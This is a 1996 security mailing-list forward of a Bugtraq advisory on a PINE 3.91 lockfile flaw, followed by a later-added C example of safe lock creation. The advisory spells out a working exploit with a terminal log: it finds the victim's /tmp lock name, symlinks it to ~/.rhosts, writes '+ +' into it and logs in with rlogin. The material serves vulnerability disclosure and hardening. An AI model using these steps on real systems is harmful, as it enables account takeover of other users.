From proff  Wed Sep 18 00:33:37 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id AAA15735 for best-of-security; Wed, 18 Sep 1996 00:33:36 +1000
From: Julian Assange <proff>
Message-Id: <199609171433.AAA15735@suburbia.net>
Subject: [linux-security] [BUG] Vulnerability in PINE
To: best-of-security
Date: Wed, 18 Sep 1996 00:33:35 +1000 (EST)
Approved: proff@suburbia.net
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text

Forwarded message:
From best-of-security-request@suburbia.net  Wed Sep 18 00:24:28 1996
X-Envelope-From: slogic@lightning.netcore.com.au  Wed Sep 18 00:24:14 1996
From: Tech-Manip <slogic@lightning.netcore.com.au>
Message-Id: <199609172007.QAA11350@lightning.netcore.com.au>
Subject: [linux-security] [BUG] Vulnerability in PINE (fwd)
To: best-of-security@suburbia.net
Date: Tue, 17 Sep 1996 16:07:49 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit


- Not sure if I have already sent this one, so here it is anyway.

- Greg.



Forwarded message:
> From owner-linux-security@tarsier.cv.nrao.edu Tue Sep 17 15:05:40 1996
> Resent-Date: Mon, 16 Sep 1996 12:31:19 -0400
> Resent-From: Jeff Uphoff <juphoff@tarsier.cv.nrao.edu>
> Resent-Message-Id: <199609161631.MAA08586@tarsier.cv.nrao.edu>
> Resent-To: linux-security@tarsier.cv.nrao.edu
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Message-ID: <Pine.LNX.3.95.960826192918.1836B-100000@litterbox.org>
> X-cc:         New Hack City Projects <project@newhackcity.net>,
>               Raven <raven@raven.cybercom.net>, Bill Arcand <bill@demtech.com>,
>               "(d)(M)(v)" <dmv@shore.net>
> From: "Sean B. Hamor" <hamors@litterbox.org>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
> Subject: [linux-security] [BUG] Vulnerability in PINE
> Date: 	Mon, 26 Aug 1996 19:35:05 -0400
> X-Mailer: VM 5.95 (beta); GNU Emacs 19.29.1
> X-Attribution: Up
> Sender: owner-linux-security@tarsier.cv.nrao.edu
> Precedence: list
> 
> [Mod: Forwarded from Bugtraq.  --Jeff.]
> 
> 
>                                                        Monday, August 26, 1996
>                                                                  The Litterbox
>                                                                  Sean B. Hamor
> 
> Note:
> 
>   I'm not sure whether or not this information has been previously released.
>   I found this earlier this evening while poking around, and apologize if
>   I've just found an old bug.
> 
>   I verified the existence of this bug in PINE 3.91, however it had been
>   fixed in 3.95.  I don't know if 3.92, 3.93, or 3.94 are affected.  Even
>   though this bug has been fixed, I thought I'd still release this because
>   many Linux installations still use PINE 3.91, and most machines I have
>   accounts on still use PINE 3.91.
> 
> 
> Synopsis:
> 
>   A problem exists in PINE where the name used for the lockfile in /tmp/ is
>   easily guessable.  From various testing on a few machines, the name of the
>   lockfile is static for each user who launches PINE.  Note that the
>   lockfile is only created when there is new mail in the user's INBOX.
> 
>   This wouldn't normally be a problem; however, this lockfile is created mode
>   666 in /tmp/.  The static lockfile name can be easily attained by doing an
>   ls in /tmp/ when it has been determined that the user is running PINE and
>   has new email.
> 
> 
> Exploit:
> 
>   By watching the process table with ps to see which users are running PINE,
>   one can then do an ls in /tmp/ to gather the lockfile names for each user.
>   Watching the process table once again will now reveal when each user quits
>   PINE or runs out of unread messages in their INBOX, effectively deleting
>   the respective lockfile.
> 
>   Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts
>   (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666
>   file with PINE's process id as its contents.  One may now simply do an
>   echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
> 
>   For this example, hamors is the victim while catluvr is the attacker:
> 
> hamors (21 19:04) litterbox:~> pine
> 
> catluvr (6 19:06) litterbox:~> ps -aux | grep pine
> catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
> hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine
> 
> catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
> -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4
> 
> catluvr (8 19:07) litterbox:~> ps -aux | grep pine
> catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine
> 
> catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
> 
> hamors (23 19:09) litterbox:~> pine
> 
> catluvr (11 19:10) litterbox:~> ps -aux | grep pine
> catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
> hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine
> 
> catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
> 
> catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
> + +
> 
> catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
> 
> catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
> 
> Verification:
> 
> This vulnerability has been tested on the following platforms with the
> following versions of PINE:
> 
>   Linux Slackware 3.0 (1.2.13):  PINE 3.91
>   FreeBSD 2.1.0-RELEASE:  PINE 3.91
> 
>   Problem has been fixed in PINE 3.95 under Linux Slackware 3.0 (1.2.13):
> 
>   Log entry:
>   Aug 26 19:10:58 litterbox syslog: SECURITY PROBLEM: lock file /tmp/.302.f5a4 is a symbolic link
> 
>   User warning:
>   [SECURITY ALERT: symbolic link on lock name!]
>   [Can't open mailbox lock, access is readonly]
> 
> EOF
> 
> Finger hamors@ishiboo.com           /\_/\          mailto:hamors@litterbox.org
> for PGP public key block.          ( o.o )     http://www.ishiboo.com/~hamors/
> alt.litterbox, The Home of TOCA     > ^ <    http://www.litterbox.org/~hamors/
>  Hi!  I'm a .signature virus!  Add me to your .signature and join in the fun!
> 
> 

--
slogic@netcore.com.au
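The symlink check PINE 3.95 logs ("lock file ... is a symbolic link") is only half of the fix for the advisory above; the other half is creating the lock atomically with O_CREAT|O_EXCL|O_NOFOLLOW and a mode that other users cannot write to, so there is no window between "look" and "create". The C below is an added example written for this thread, not PINE's own locking code; the temp directory, the lock name reused from the advisory and the `victim_rhosts` stand-in for ~/.rhosts are constructed for the self-check.

```c
#define _GNU_SOURCE 1        /* O_NOFOLLOW, mkdtemp on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

enum lock_result { LOCK_OK = 0, LOCK_SYMLINK, LOCK_EXISTS, LOCK_ERROR };

/* Create `path` as a lock file safely: O_CREAT|O_EXCL makes creation atomic and
 * fails if anything (a symlink included) already sits at the name, O_NOFOLLOW
 * refuses to follow a link, 0600 keeps other users out. lstat() only classifies. */
int create_lock_safely(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) {
        struct stat st;
        if (errno == ELOOP) return LOCK_SYMLINK;
        if (errno == EEXIST)
            return (lstat(path, &st) == 0 && S_ISLNK(st.st_mode)) ? LOCK_SYMLINK : LOCK_EXISTS;
        return LOCK_ERROR;
    }
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid()); /* PINE stores its pid too */
    if (write(fd, buf, (size_t)n) != n) { close(fd); unlink(path); return LOCK_ERROR; }
    close(fd);
    return LOCK_OK;
}

/* Self-check in a private temp dir: a symlink planted at the lock name (the
 * advisory's /tmp/.302.f5a4 -> ~/.rhosts scenario) must be refused and its
 * target left uncreated; a clean name must then be created mode 0600.
 * Returns 0 on success or a nonzero code naming the step that failed. */
int demo_lock_hardening(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", target[256], lock[256];
    struct stat st; int rc = 0;
    if (mkdtemp(dir) == NULL) return 10;
    snprintf(target, sizeof target, "%s/victim_rhosts", dir); /* stands in for ~/.rhosts */
    snprintf(lock, sizeof lock, "%s/.302.f5a4", dir);
    if (symlink(target, lock) != 0) rc = 11;
    else if (create_lock_safely(lock) != LOCK_SYMLINK) rc = 12;
    else if (lstat(target, &st) == 0) rc = 13;          /* target must not exist */
    else if (unlink(lock) != 0) rc = 14;
    else if (create_lock_safely(lock) != LOCK_OK) rc = 15;
    else if (stat(lock, &st) != 0 || (st.st_mode & 0777) != 0600) rc = 16;
    unlink(lock); unlink(target); rmdir(dir);
    return rc;
}
```

A client that wants the 3.95 behaviour can log the LOCK_SYMLINK result exactly as the advisory's syslog line does and fall back to read-only access instead of writing through the link.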


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+

